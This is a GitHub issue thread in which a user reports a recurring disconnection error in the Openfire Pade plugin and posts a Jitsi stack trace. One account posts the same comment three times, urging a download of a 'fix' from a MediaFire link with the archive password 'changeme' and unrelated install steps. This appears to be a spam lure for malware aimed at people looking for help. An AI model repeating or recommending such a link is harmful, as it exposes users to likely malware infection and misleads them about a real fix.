### ISSUE TITLE
Getting error - You have been disconnected. You may want to check your network connection. Reconnecting in 22 sec...

### ISSUE THREAD

**Issue by chughrahul** [igniterealtime/openfire-pade-plugin#474]
Hi,

I'm continuously getting this error on my openfire 4.8.1 with pade 1.8.2. I've checked the configurations and other ofProperty fields but everything seems ok. I keep getting this error on console - 
```
[modules/xmpp/moderator.js] <Ir._handleError>:  Failed to get a successful response, giving up. Error: Failed to get a successful response, giving up.
    at Ir._handleError (lib-jitsi-meet.min.js:13093:13)
    at Ir._handleIqError (lib-jitsi-meet.min.js:13106:142)
    at lib-jitsi-meet.min.js:13056:200
    at P.Handler.handler (lib-jitsi-meet.min.js:7596:17)
    at P.Handler.run (lib-jitsi-meet.min.js:7466:19)
    at lib-jitsi-meet.min.js:7693:64
    at Object.forEachChild (lib-jitsi-meet.min.js:7214:80)
    at P.Connection._dataRecv (lib-jitsi-meet.min.js:7687:13)
    at N.Websocket._onMessage (lib-jitsi-meet.min.js:8364:277)
```
<img width="1440" alt="Screenshot 2024-08-27 at 9 52 40 AM" src="https://github.com/user-attachments/assets/4b074056-f031-405b-a2db-3ded6cc03561">
<img width="1440" alt="Screenshot 2024-08-27 at 9 51 53 AM" src="https://github.com/user-attachments/assets/36b4dd0b-af28-4e73-8477-6d814e4b3118">

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by chughrahul** [comment]
@deleolajide @gjaekel Any solutions for this please? I'm urgently working on it.
